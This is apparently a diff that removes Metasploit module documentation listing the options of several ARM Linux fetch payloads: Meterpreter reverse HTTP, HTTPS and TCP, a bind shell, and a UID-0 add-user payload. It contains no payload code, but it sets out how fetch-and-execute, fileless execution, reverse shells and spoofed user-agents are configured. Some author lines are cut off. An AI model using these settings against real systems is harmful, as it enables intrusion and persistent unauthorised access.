||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME shDguViqh no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,104 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_http
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 102
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
|
|
||||||
Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_http:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8080 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME StuziyPw no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMBE payload from an HTTP server.
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,106 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_https
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 114
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
|
|
||||||
Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_https:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
ok@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8443 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME XhqxIbdAADBV no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMBE payload from an HTTP server.
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,97 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 105
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
Adam Cammack <adam_cammack@rapid7.com>
|
|
||||||
Brent Cook <brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME aubpeJLQm no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMBE payload from an HTTP server.
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,72 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline
|
|
||||||
Module: payload/cmd/linux/http/armbe/shell_bind_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 0
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
CMD /bin/sh yes The command to execute.
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME ftrEeBVpS no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMBE payload from an HTTP server.
|
|
||||||
Listen for a connection and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,70 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch, Linux Add User
|
|
||||||
Module: payload/cmd/linux/http/armle/adduser
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: Yes
|
|
||||||
Total size: 108
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
Jonathan Salwan
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
PASS metasploit yes The password for this user
|
|
||||||
SHELL /bin/sh no The shell for this user
|
|
||||||
USER metasploit yes The username to create
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME CXQGzVAHjB no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMLE payload from an HTTP server.
|
|
||||||
Create a new user with UID 0
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,68 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch, Linux Execute Command
|
|
||||||
Module: payload/cmd/linux/http/armle/exec
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 114
|
|
